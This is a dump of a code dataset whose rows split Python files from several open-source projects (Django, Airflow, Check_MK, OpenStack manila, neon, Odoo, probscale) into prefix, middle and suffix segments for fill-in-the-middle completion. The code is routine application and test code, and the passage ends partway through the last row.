repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
bkosawa/admin-recommendation | crawler/migrations/0006_user_recommended_apps.py | Python | apache-2.0 | 455 | 0 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2017-03-25 22:15
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
de | pendencies = [
('crawler', '0005_userapps'),
]
operations = [
migrations.AddField(
m | odel_name='user',
name='recommended_apps',
field=models.ManyToManyField(to='crawler.App'),
),
]
|
scopatz/regolith | regolith/helpers/a_proprevhelper.py | Python | cc0-1.0 | 4,818 | 0.002491 | """Builder for Current and Pending Reports."""
import datetime as dt
import sys
import time
from argparse import RawTextHelpFormatter
import nameparser
from regolith.helpers.basehelper import SoutHelperBase, DbHelperBase
from regolith.dates import month_to_int, month_to_str_int
from regolith.fsclient import _id_key
from regolith.sorters import position_key
from regolith.tools import (
all_docs_from_collection,
filter_grants,
fuzzy_retrieval,
)
ALLOWED_TYPES = ["nsf", "doe", "other"]
ALLOWED_STATI = ["invited", "accepted", "declined", "downloaded", "inprogress",
"submitted", "cancelled"]
def subparser(subpi):
subpi.add_argument("name", help= | "pi first name space last name in quotes",
default=None)
subpi.add_argument("type", help=f"{ALLOWED_TYPES}", default=None)
subpi.add_argu | ment("due_date", help="due date in form YYYY-MM-DD")
subpi.add_argument("-d", "--database",
help="The database that will be updated. Defaults to "
"first database in the regolithrc.json file."
)
subpi.add_argument("-q", "--requester",
help="Name of the Program officer requesting"
)
subpi.add_argument("-r", "--reviewer",
help="name of the reviewer. Defaults to sbillinge")
subpi.add_argument("-s", "--status",
help=f"status, from {ALLOWED_STATI}. default is accepted")
subpi.add_argument("-t", "--title",
help="the title of the proposal")
return subpi
class PropRevAdderHelper(DbHelperBase):
"""Build a helper"""
btype = "a_proprev"
needed_dbs = ['proposalReviews']
def construct_global_ctx(self):
"""Constructs the global context"""
super().construct_global_ctx()
gtx = self.gtx
rc = self.rc
if not rc.database:
rc.database = rc.databases[0]["name"]
rc.coll = "proposalReviews"
gtx["proposalReviews"] = sorted(
all_docs_from_collection(rc.client, "proposalReviews"), key=_id_key
)
gtx["all_docs_from_collection"] = all_docs_from_collection
gtx["float"] = float
gtx["str"] = str
gtx["zip"] = zip
def db_updater(self):
rc = self.rc
name = nameparser.HumanName(rc.name)
month = dt.datetime.today().month
year = dt.datetime.today().year
key = "{}{}_{}_{}".format(
str(year)[-2:], month_to_str_int(month), name.last.casefold(),
name.first.casefold().strip("."))
coll = self.gtx[rc.coll]
pdocl = list(filter(lambda doc: doc["_id"] == key, coll))
if len(pdocl) > 0:
sys.exit("This entry appears to already exist in the collection")
else:
pdoc = {}
pdoc.update({'adequacy_of_resources': [
'The resources available to the PI seem adequate'],
'agency': rc.type,
'competency_of_team': [],
'doe_appropriateness_of_approach': [],
'doe_reasonableness_of_budget': [],
'doe_relevance_to_program_mission': [],
'does_how': [],
'does_what': '',
'due_date': rc.due_date,
'freewrite': [],
'goals': [],
'importance': [],
'institutions': [],
'month': 'tbd',
'names': name.full_name,
'nsf_broader_impacts': [],
'nsf_create_original_transformative': [],
'nsf_plan_good': [],
'nsf_pot_to_advance_knowledge': [],
'nsf_pot_to_benefit_society': [],
'status': 'accepted',
'summary': '',
'year': 2020
})
if rc.title:
pdoc.update({'title': rc.title})
else:
pdoc.update({'title': ''})
if rc.requester:
pdoc.update({'requester': rc.requester})
else:
pdoc.update({'requester': ''})
if rc.reviewer:
pdoc.update({'reviewer': rc.reviewer})
else:
pdoc.update({'reviewer': 'sbillinge'})
if rc.status:
if rc.status not in ALLOWED_STATI:
raise ValueError(
"status should be one of {}".format(ALLOWED_STATI))
else:
pdoc.update({'status': rc.status})
else:
pdoc.update({'status': 'accepted'})
pdoc.update({"_id": key})
rc.client.insert_one(rc.database, rc.coll, pdoc)
print("{} proposal has been added/updated in proposal reviews".format(
rc.name))
return
|
adventurerscodex/uat | components/core/character/proficiency.py | Python | gpl-3.0 | 1,561 | 0 | """Proficiency components."""
from component_objects import Component, Element
class ProficiencyAddModal(Component):
"""Definition of proficiency add modal component."""
modal_div_id = 'addProficiency'
name_id = 'proficiencyAddNameInput'
type_id = 'proficiencyAddTypeInput'
description_id = 'proficiencyAddDescriptionTextarea'
add_id = 'proficiencyAddAddButton'
modal_div = Element(id_=modal_div_id)
name = Element(id_=name_id)
type_ = Element(id_=type_id)
description = Element(id_=description_id)
add = Element(id_=add_id)
class ProficiencyEditModal(Component):
"""Definition of proficiency edit modal component."""
modal_div_id = 'viewProficiency'
name_id = 'proficiencyEditNameInput'
type_id = 'proficiencyEditTypeInput'
description_id = 'proficiencyEditDescriptionTextarea'
done_id = 'proficiencyEditDoneButton'
modal_div = Element(id_=modal_div_id)
name = Element(id_= | name_id)
type_ = Element(id_=type_id)
description = Element(id_=description_id)
done = Element(id_=done_id)
class ProficiencyModalTabs(Component):
"""Definition of profici | ency modal tabs component."""
preview_id = 'proficiencyModalPreview'
edit_id = 'proficiencyModalEdit'
preview = Element(id_=preview_id)
edit = Element(id_=edit_id)
class ProficiencyTable(Component):
"""Definition of proficiencys edit modal componenet."""
add_id = 'proficiencyAddIcon'
table_id = 'proficiencyTable'
add = Element(id_=add_id)
table = Element(id_=table_id)
|
bukzor/pgctl | tests/unit/cli.py | Python | mit | 950 | 0 | # -*- coding: utf-8 -*-
# pylint:disable=redefined-outer-name,unused-argument
from __future__ import absolute_import
from __future__ import unicode_literals
from testfixtures import ShouldRaise
from pgctl.cli import main
def test_start(in_example_dir):
assert main(['start']) == "No such playground service: 'default'"
def test_stop(in_example_dir):
assert main(['stop']) == "No such playground service: 'default'"
def test_status( | in_example_dir):
assert main(['status']) is None
def test_restart(in_example_dir):
assert main(['restart']) is None
def test_reload(in_example_dir):
assert main(['reload']) is None
def test_log(in_example_dir):
assert main(['log']) is None
def test_debug(in_example_dir):
assert main(['debug']) is None
def test_config(in_example_dir):
assert main(['config']) is None
def test_nonsense(in_example_dir):
with ShouldRaise(SystemExit(2)):
main(['non | sense'])
|
huiyiqun/check_mk | web/htdocs/mkeventd.py | Python | gpl-2.0 | 15,616 | 0.006404 | #!/usr/bin/python
# -*- encoding: utf-8; py-indent-offset: 4 -*-
# +------------------------------------------------------------------+
# | ____ _ _ __ __ _ __ |
# | / ___| |__ ___ ___| | __ | \/ | |/ / |
# | | | | '_ \ / _ \/ __| |/ / | |\/| | ' / |
# | | |___| | | | __/ (__| < | | | | . \ |
# | \____|_| |_|\___|\___|_|\_\___|_| |_|_|\_\ |
# | |
# | Copyright Mathias Kettner 2014 mk@mathias-kettner.de |
# +------------------------------------------------------------------+
#
# This file is part of Check_MK.
# The official homepage is at http://mathias-kettner.de/check_mk.
#
# check_mk is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation in version 2. check_mk is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; with-
# out even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE. See the GNU General Public License for more de-
# tails. You should have received a copy of the GNU General Public
# License along with GNU Make; see the file COPYING. If not, write
# to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
# Boston, MA 02110-1301 USA.
import ast
import re
import socket
import time
import os
from pathlib2 import Path
import config
import livestatus
import sites
from gui_exceptions import MKGeneralException
import cmk.paths
import cmk.ec.settings
import cmk.ec.export
import cmk.store
import cmk.utils
if cmk.is_managed_edition():
import managed
else:
managed = None
# ASN1 MIB source directory candidates. Non existing dirs are ok.
# Please sync these paths with htdocs/mkeventd.py
mib_dirs = [ ('/usr/share/snmp/mibs', _('System MIBs')) ]
socket_path = cmk.paths.omd_root + "/tmp/run/mkeventd/status"
compiled_mibs_dir = cmk.paths.omd_root + "/local/share/check_mk/compiled_mibs"
# Please sync these paths with htdocs/mkeventd.py
mib_upload_dir = cmk.paths.omd_root + "/local/share/snmp/mibs"
mib_dirs.insert(0, (cmk.paths.omd_root + "/share/snmp/mibs", _('MIBs shipped with Check_MK')))
mib_dirs.insert(0, (mib_upload_dir, _('Custom MIBs')))
syslog_priorities = [
(0, "emerg" ),
(1, "alert" ),
(2, "crit" ),
(3, "err" ),
(4, "warning" ),
(5, "notice" ),
(6, "info" ),
(7, "debug" ),
]
syslog_facilities = [
(0, "kern"),
(1, "user"),
(2, "mail"),
(3, "daemon"),
(4, "auth"),
(5, "syslog"),
(6, "lpr"),
(7, "news"),
(8, "uucp"),
(9, "cron"),
(10, "authpriv"),
(11, "ftp"),
(12, "(12: unused)"),
(13, "(13: unused)"),
(14, "(14: unused)"),
(15, "(15: unused)"),
(16, "local0"),
(17, "local1"),
(18, "local2"),
(19, "local3"),
(20, "local4"),
(21, "local5"),
(22, "local6"),
(23, "local7"),
(31, "snmptrap"),
]
phase_names = {
'counting' : _("counting"),
'delayed' : _("delayed"),
'open' : _("open"),
'ack' : _("acknowledged"),
'closed' : _("closed"),
}
action_whats = {
"ORPHANED" : _("Event deleted in counting state because rule was deleted."),
"NOCOUNT" : _("Event deleted in counting state because rule does not count anymore"),
"DELAYOVER" : _("Event opened because the delay time has elapsed before cancelling event arrived."),
"EXPIRED" : _("Event deleted because its livetime expired"),
"COUNTREACHED" : _("Event deleted because required count had been reached"),
"COUNTFAILED" : _("Event created by required count was not reached in time"),
"UPDATE" : _("Event information updated by user"),
"NEW" : _("New event created"),
"DELETE" : _("Event deleted manually by user"),
"EMAIL" : _("Email sent"),
"SCRIPT" : _("Script executed"),
"CANCELLED" : _("The event was cancelled because the corresponding OK message was received"),
"ARCHIVED" : _("Event was archived because no rule matched and archiving is activated in global settings."),
"AUTODELETE" : _("Event was deleted automatically"),
"CHANGESTATE" : _("State of event changed by user"),
}
def service_levels():
try:
return config.mkeventd_service_levels
except:
return [(0, "(no service level)")]
def action_choices(omit_hidden = False):
# The possible actions are configured in mkeventd.mk,
# not in multisite.mk (like the service levels). That
# way we have not direct access to them but need
# to load them from the configuration.
return [ ( "@NOTIFY", _("Send monitoring notification")) ] + \
[ (a["id"], a["title"])
for a in eventd_configuration().get("actions", [])
if not omit_hidden or not a.get("hidden") ]
cached_config = None
def | eventd_configuration():
global cached_config
if cached_config and cached_config[0] is html:
return cached_config[1]
settings = cmk.ec.settings.settings('',
Path(cmk.paths.omd_root),
Path(cmk.paths.default_config_dir),
[''])
config = cmk.ec.export.load | _config(settings)
cached_config = (html, config)
return config
def daemon_running():
return os.path.exists(socket_path)
# Note: in order to be able to simulate an original IP address
# we put hostname|ipaddress into the host name field. The EC
# recognizes this and unpacks the data correctly.
def send_event(event):
# "<%PRI%>@%TIMESTAMP%;%SL% %HOSTNAME% %syslogtag% %msg%\n"
prio = (event["facility"] << 3) + event["priority"]
rfc = [
"<%d>@%d" % (prio, int(time.time())),
"%d %s|%s %s: %s\n" % (event["sl"], event["host"],
event["ipaddress"], event["application"], event["text"]),
]
execute_command("CREATE", map(cmk.utils.make_utf8, rfc), site=event["site"])
return ";".join(rfc)
def get_local_ec_status():
response = livestatus.LocalConnection().query("GET eventconsolestatus")
return dict(zip(response[0], response[1]))
def replication_mode():
try:
status = get_local_ec_status()
return status["status_replication_slavemode"]
except livestatus.MKLivestatusSocketError:
return "stopped"
# Only use this for master/slave replication. For status queries use livestatus
def query_ec_directly(query):
try:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
timeout = config.mkeventd_connect_timeout
except:
timeout = 10
sock.settimeout(timeout)
sock.connect(socket_path)
sock.sendall(query)
sock.shutdown(socket.SHUT_WR)
response_text = ""
while True:
chunk = sock.recv(8192)
response_text += chunk
if not chunk:
break
return ast.literal_eval(response_text)
except SyntaxError, e:
raise MKGeneralException(_("Invalid response from event daemon: "
"<pre>%s</pre>") % response_text)
except Exception, e:
raise MKGeneralException(_("Cannot connect to event daemon via %s: %s") %
(socket_path, e))
def execute_command(name, args=None, site=None):
if args:
formated_args = ";" + ";".join(args)
else:
formated_args = ""
query = "[%d] EC_%s%s" % (int(time.time()), name, formated_args)
sites.live().command(query, site)
def get_total_stats(only_sites):
stats_keys = [
"status_average_message_rate",
"status_average_rule_trie_rate",
"status_average_rule_hit_rate",
"status_average_event_rate",
"status_average_connect_rate",
"status_average_overflow_rate",
"status_average_rule_trie_rate",
"status_average_rule_hit_rate",
"status_average_proce |
brandsoulmates/incubator-airflow | airflow/operators/S3_to_FS.py | Python | apache-2.0 | 1,792 | 0 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from airflow.hooks.S3_hook import S3Hook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class S3ToFileSystem(BaseOperator):
@apply_defaults
def __init__(
self,
s3_bucket,
s3_key,
download_file_location,
s3_conn_id='s3_default',
* a | rgs, **kwargs):
super(S3ToFileSystem, self).__init__(*args, **kwargs)
self.local_location = download_file_location
self.s3_bucket = s3_bucket
self.s3_key = s3_key
self.s3_conn_id = s3_conn_id
def | execute(self, context):
self.s3 = S3Hook(s3_conn_id=self.s3_conn_id)
file_paths = []
for k in self.s3.list_keys(self.s3_bucket, prefix=self.s3_key):
kpath = os.path.join(self.local_location, os.path.basename(k))
# Download the file
self.s3.download_file(self.s3_bucket, k, kpath)
file_paths.append(kpath)
context['ti'].xcom_push(key=kpath, value="")
context['ti'].xcom_push(key="files_added", value=file_paths)
# read in chunks
# start reading from the file.
# insert in respective SQS operators
|
vponomaryov/manila | manila_tempest_tests/tests/api/admin/test_migration_negative.py | Python | apache-2.0 | 14,208 | 0 | # Copyright 2015 Hitachi Data Systems.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
from tempest import config
from tempest.lib.common.utils import data_utils
from tempest.lib import exceptions as lib_exc
import testtools
from testtools import testcase as tc
from manila_tempest_tests.common import constants
from manila_tempest_tests import share_exceptions
from manila_tempest_tests.tests.api import base
from manila_tempest_tests import utils
CONF = config.CONF
@ddt.ddt
class MigrationNegativeTest(base.BaseSharesAdminTest):
"""Tests Share Migration.
Tests share migration in multi-backend environment.
"""
protocol = "nfs"
@classmethod
def resource_setup(cls):
super(MigrationNegativeTest, cls).resource_setup()
if cls.protocol not in CONF.share.enable_protocols:
message = "%s tests are disabled." % cls.protocol
raise cls.skipException(message)
if not (CONF.share.run_host_assisted_migration_tests or
CONF.share.run_driver_assisted_migration_tests):
raise cls.skipException("Share migration tests are disabled.")
pools = cls.shares_client.list_pools(detail=True)['pools']
if len(pools) < 2:
raise cls.skipException("At least two different pool entries "
"are needed to run share migration tests.")
cls.share = cls.create_share(cls.protocol,
size=CONF.share.share_size+1)
cls.share = cls.shares_client.get_share(cls.share['id'])
cls.default_type = cls.shares_v2_client.list_share_types(
default=True)['share_type']
dest_pool = utils.choose_matching_backend(
cls.share, pools, cls.default_type)
if not dest_pool or dest_pool.get('name') is None:
raise share_exceptions.ShareMigrationException(
"No valid pool entries to run share migration tests.")
cls.dest_pool = dest_pool['name']
cls.new_type_invalid = cls.create_share_type(
name=data_utils.rand_name(
'new_invalid_share_type_for_migration'),
cleanup_in_class=True,
extra_specs=utils.get_configured_extra_specs(variation='invalid'))
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.22")
def test_migration_cancel_invalid(self):
self.assertRaises(
lib_exc.BadRequest, self.shares_v2_client.migration_cancel,
self.share['id'])
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.22")
def test_migration_get_progress_None(self):
self.shares_v2_client.reset_task_state(self.share["id"], None)
self.shares_v2_client.wait_for_share_status(
self.share["id"], None, 'task_state')
self.assertRaises(
lib_exc.BadRequest, self.shares_v2_client.migration_get_progress,
self.share['id'])
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.22")
def test_migration_complete_invalid(self):
self.assertRaises(
lib_exc.BadRequest, self.shares_v2_client.migration_complete,
self.share['id'])
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.22")
def test_migration_cancel_not_foun | d(self):
self.assertRaises(
lib_exc.NotFound, self.shares_v2_client.migration_cancel,
'invalid_share_id')
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.22")
def test_migration_get_progress_not_found(self):
self.assertRaises(
lib_exc.NotFound, self.shares_v2_client.migration_get_progress,
'invalid_share_id')
@tc.attr(base.TAG_NEGATIVE, base.TAG_ | API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.22")
def test_migration_complete_not_found(self):
self.assertRaises(
lib_exc.NotFound, self.shares_v2_client.migration_complete,
'invalid_share_id')
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.29")
@testtools.skipUnless(CONF.share.run_snapshot_tests,
"Snapshot tests are disabled.")
def test_migrate_share_with_snapshot(self):
snap = self.create_snapshot_wait_for_active(self.share['id'])
self.assertRaises(
lib_exc.Conflict, self.shares_v2_client.migrate_share,
self.share['id'], self.dest_pool,
force_host_assisted_migration=True)
self.shares_v2_client.delete_snapshot(snap['id'])
self.shares_v2_client.wait_for_resource_deletion(snapshot_id=snap[
"id"])
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.29")
@ddt.data(True, False)
def test_migrate_share_same_host(self, specified):
new_share_type_id = None
new_share_network_id = None
if specified:
new_share_type_id = self.default_type['id']
new_share_network_id = self.share['share_network_id']
self.migrate_share(
self.share['id'], self.share['host'],
wait_for_status=constants.TASK_STATE_MIGRATION_SUCCESS,
new_share_type_id=new_share_type_id,
new_share_network_id=new_share_network_id)
# NOTE(ganso): No need to assert, it is already waiting for correct
# status (migration_success).
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.29")
def test_migrate_share_host_invalid(self):
self.assertRaises(
lib_exc.NotFound, self.shares_v2_client.migrate_share,
self.share['id'], 'invalid_host')
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.29")
@ddt.data({'writable': False, 'preserve_metadata': False,
'preserve_snapshots': False, 'nondisruptive': True},
{'writable': False, 'preserve_metadata': False,
'preserve_snapshots': True, 'nondisruptive': False},
{'writable': False, 'preserve_metadata': True,
'preserve_snapshots': False, 'nondisruptive': False},
{'writable': True, 'preserve_metadata': False,
'preserve_snapshots': False, 'nondisruptive': False})
@ddt.unpack
def test_migrate_share_host_assisted_not_allowed_API(
self, writable, preserve_metadata, preserve_snapshots,
nondisruptive):
self.assertRaises(
lib_exc.BadRequest, self.shares_v2_client.migrate_share,
self.share['id'], self.dest_pool,
force_host_assisted_migration=True, writable=writable,
preserve_metadata=preserve_metadata, nondisruptive=nondisruptive,
preserve_snapshots=preserve_snapshots)
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.29")
def test_migrate_share_change_type_no_valid_host(self):
if not CONF.share.multitenancy_enabled:
new_share_network_id = self.create_share_network(
neutron_net_id='fake_net_id',
neutron_subnet_id='fake_subnet_id')['id']
else:
new_share_network_id = None
self.shares_v2_client.migrate_share(
self.share['id'], self.dest_pool,
new_share_type_id=self.new_type_invalid['share_type']['id'],
new_share_network_id= |
jfsantos/neon | tests/test_costs.py | Python | apache-2.0 | 5,749 | 0.001044 | # Copyright 2015 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
'''
Test of the cost functions
'''
import numpy as np
from neon import NervanaObject
from neon.transforms import (CrossEntropyBinary, CrossEntropyMulti, SumSquared,
Misclassification)
def compare_tensors(func, y, t, outputs, deriv=False, tol=0.):
be = NervanaObject.be
temp = be.empty(outputs.shape)
dtypeu = np.float32
if deriv is True:
temp[:] = func.bprop(be.array(dtypeu(y)), be.array(dtypeu(t)))
else:
# try:
temp[:] = func(be.array(dtypeu(y)), be.array(dtypeu(t)))
# except:
# import ipdb; ipdb.set_trace()
cond = np.sum(np.abs(temp.get() - outputs) <= tol)
assert cond == np.prod(outputs.shape)
"""
CrossEntropyBinary
"""
def test_cross_entropy_binary(backend_default):
outputs = np.array([0.5, 0.9, 0.1, 0.0001]).reshape((4, 1))
targets = np.array([0.5, 0.99, 0.01, 0.2]).reshape((4, 1))
eps = 2 ** -23
expected_result = np.sum((-targets * np.log(outputs + eps)) -
(1 - targets) * np.log(1 - outputs + eps),
keepdims=True)
compare_tensors(CrossEntropyBinary(),
outputs, targets, expected_result, tol=1e-6)
def test_cross_entropy_binary_limits(backend_default):
outputs = np.array([0.5, 1.0, 0.0, 0.0001]).reshape((4, 1))
targets = np.array(([0.5, 0.0, 1.0, 0.2])).reshape((4, 1))
eps = 2 ** -23
expected_result = np.sum((-targets * np.log(outputs + eps)) -
(1 - targets) * np.log(1 - outputs + eps),
keepdims=True)
compare_tensors(CrossEntropyBinary(),
outputs, targets, expected_result, tol=1e-5)
def test_cross_entropy_binary_derivative(backend_default):
outputs = np.array([0.5, 1.0, 0.0, 0.0001]).reshape((4, 1))
targets = np.array(([0.5, 0.0, 1.0, 0.2])).reshape((4, 1))
# bprop assumes shortcut
expected_result = ((outputs - targets) / outputs.shape[1])
compare_tensors(
CrossEntropyBinary(), outputs, targets, expected_result, deriv=True,
tol=1e-6)
"""
CrossEntropyMulti
"""
def test_cross_entropy_multi(backend_default):
outputs = np.array([0.5, 0.9, 0.1, 0.0001]).reshape((4, 1))
targets = np.array([0.5, 0.99, 0.01, 0.2]).reshape((4, 1))
eps = 2 ** -23
expected_result = np.sum(-targets * np.log(np.clip(outputs, eps, 1.0)),
axis=0, keepdims=True)
compare_tensors(CrossEntropyMulti(),
outputs, targets, expected_result, tol=1e-6)
def test_cross_entropy_multi_limits(backend_default):
outputs = np.array([0.5, 1.0, 0.0, 0.0001]).reshape((4, 1))
targets = np.array(([0.5, 0.0, 1.0, 0.2])).reshape((4, 1))
eps = 2 ** -23
expected_result = np.sum(-targets * np.log(np.clip(outputs, eps, 1.0)),
axis=0, keepdims=True)
compare_tensors(CrossEntropyM | ulti(),
outputs, targets, expected_result, tol=1e-5)
def test_cross_entropy_multi_derivative(backend_default):
outputs = np | .array([0.5, 1.0, 0.0, 0.0001]).reshape((4, 1))
targets = np.array(([0.5, 0.0, 1.0, 0.2])).reshape((4, 1))
expected_result = ((outputs - targets) / outputs.shape[1])
compare_tensors(CrossEntropyMulti(), outputs, targets, expected_result,
deriv=True, tol=1e-6)
"""
SumSquared
"""
def test_sum_squared(backend_default):
outputs = np.array([0.5, 0.9, 0.1, 0.0001]).reshape((4, 1))
targets = np.array([0.5, 0.99, 0.01, 0.2]).reshape((4, 1))
expected_result = np.sum((outputs - targets) ** 2, axis=0, keepdims=True) / 2.
compare_tensors(SumSquared(), outputs, targets, expected_result, tol=1e-8)
def test_sum_squared_limits(backend_default):
outputs = np.array([0.5, 1.0, 0.0, 0.0001]).reshape((4, 1))
targets = np.array(([0.5, 0.0, 1.0, 0.2])).reshape((4, 1))
expected_result = np.sum((outputs - targets) ** 2, axis=0, keepdims=True) / 2.
compare_tensors(SumSquared(), outputs, targets, expected_result, tol=1e-7)
def test_sum_squared_derivative(backend_default):
outputs = np.array([0.5, 1.0, 0.0, 0.0001]).reshape((4, 1))
targets = np.array(([0.5, 0.0, 1.0, 0.2])).reshape((4, 1))
expected_result = (outputs - targets) / outputs.shape[1]
compare_tensors(SumSquared(), outputs,
targets, expected_result, deriv=True, tol=1e-8)
"""
Misclassification
"""
def compare_metric(func, y, t, outputs, deriv=False, tol=0.):
be = NervanaObject.be
dtypeu = np.float32
temp = func(be.array(dtypeu(y)), be.array(dtypeu(t)))
cond = np.sum(np.abs(temp - outputs) <= tol)
assert cond == np.prod(outputs.shape)
def test_misclassification(backend_default):
NervanaObject.be.bsz = 3
outputs = np.array(
[[0.25, 0.99, 0.33], [0.5, 0.005, 0.32], [0.25, 0.005, 0.34]])
targets = np.array([[0, 1, 0], [1, 0, 1], [0, 0, 0]])
expected_result = np.ones((1, 1)) / 3.
compare_metric(Misclassification(),
outputs, targets, expected_result, tol=1e-7)
|
rven/odoo | addons/microsoft_calendar/models/res_users.py | Python | agpl-3.0 | 5,093 | 0.003927 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import logging
import requests
from odoo.addons.microsoft_calendar.models.microsoft_sync import microsoft_calendar_token
from datetime import timedelta
from odoo import api, fields, models, _
from odoo.exceptions import UserError
from odoo.loglevels import exception_to_unicode
from odoo.addons.microsoft_account.models.microsoft_service import MICROSOFT_TOKEN_ENDPOINT
from odoo.addons.microsoft_calendar.utils.microsoft_calendar import MicrosoftCalendarService, InvalidSyncToken
_logger = logging.getLogger(__name__)
class User(models.Model):
_inherit = 'res.users'
microsoft_calendar_sync_token = fields.Char('Microsoft Next Sync Token', copy=False)
def _microsoft_calendar_authenticated(self):
return bool(self.sudo().microsoft_calendar_rtoken)
def _get_microsoft_calendar_token(self):
self.ensure_one()
if self._is_microsoft_calendar_valid():
self._refresh_microsoft_calendar_token()
return self.microsoft_calendar_token
def _is_microsoft_calendar_valid(self):
return self.microsoft_calendar_token_validity and self.microsoft_calendar_token_validity < (fields.Datetime.now() + timedelta(minutes=1))
def _refresh_microsoft_calendar_token(self):
self.ensure_one()
get_param = self.env['ir.config_parameter'].sudo().get_param
client_id = get_param('microsoft_calendar_client_id')
client_secret = get_param('microsoft_calendar_client_secret')
if not client_id or not client_secret:
raise UserError(_("The account for the Outlook Calendar service is not configured."))
headers = {"content-type": "application/x-www-form-urlencoded"}
data = {
'refresh_token': self.microsoft_calendar_rtoken,
'client_id': client_id,
'client_secret': client_secret,
'grant_type': 'refresh_token',
}
try:
dummy, response, dummy = self.env['microsoft.service']._do_request(MICROSOFT_TOKEN_ENDPOINT, params=data, headers=headers, method='POST', preuri='')
ttl = response.get('expires_in')
self.write({
'microsoft_calendar_token': response.get('access_token'),
'microsoft_calendar_token_validity': fields.Datetime.now() + timedelta(seconds=ttl),
})
except requests.HTTPError as error:
if error.response.status_code == 400: # invalid grant
# Delete refresh token and make sure it's commited
with self.pool.cursor() as cr:
self.env.user.with_env(self.env(cr=cr)).write({'microsoft_calendar_rtoken': False})
error_key = error.response.json().get("error", "nc")
error_msg = _("Something went wrong during your token generation. Maybe your Authorization Code is invalid or already expired [%s]", error_key)
raise UserError(error_msg)
def _sync_microsoft_calendar(self, calendar_service: MicrosoftCalendarService):
self.ensure_one()
full_sync = not bool(self.microsoft_calendar_sync_token)
with microsoft_calendar_token(self) as token:
try:
events, next_sync_token, default_reminders = calendar_service.get_events(self.microsoft_calendar_sync_token, token=token)
except InvalidSyncToken:
events, next_sync_token, default_reminders = calendar_service.get_events(token=token)
full_sync = True
self.microsoft_calendar_sync_token = next_sync_token
# Microsoft -> Odoo
recurrences = events.filter(lambda e: e.is_recurrent())
synced_events, synced_recurrences = self.env['calendar.event']._sync_microsoft2odoo(events, default_reminders=default_reminders) if events else (self.env['calendar.event'], self.env['calendar.recurrence'])
# Odoo -> Microsoft
recurrences = self.env['calendar.recurrence']._get_microsoft_records_to_sync(full_sync=full_sync)
recurrences -= synced_recurrences
recurrences._sync_odoo2microsoft(calendar_service)
synced_events |= recurrences.calendar_event_ids
events = self.env['calendar.event']._get_microsoft_records_to_sync(full_sync=full_sync)
(events - synced_events)._sync_odoo2microsoft(calendar_service)
return bool(events | synced_events) or bool(recurrences | synced_recurrences)
    @api.model
    def _sync_all_microsoft_calendar(self):
        """ Cron job """
        # Only users that completed the OAuth flow have a refresh token.
        users = self.env['res.users'].search([('microsoft_calendar_rtoken', '!=', False)])
        microsoft = MicrosoftCalendarService(self.env['microsoft.service'])
        for user in users:
            _logger.info("Calendar Synchro - Starting synchronization for %s", user)
            try:
                # Run the sync as the target user so their own records/rights apply.
                user.with_user(user).sudo()._sync_microsoft_calendar(microsoft)
            except Exception as e:
                # Best effort: one failing user must not abort the whole cron run.
                _logger.exception("[%s] Calendar Synchro - Exception : %s !", user, exception_to_unicode(e))
|
phobson/mpl-probscale | probscale/validate.py | Python | bsd-3-clause | 2,443 | 0 | from matplotlib import pyplot
from .algo import _bs_fit
def axes_object(ax):
    """Validate *ax* as a matplotlib Axes, creating one when it is None.

    Returns the ``(figure, axes)`` pair, in that order.
    """
    if ax is None:
        ax = pyplot.gca()
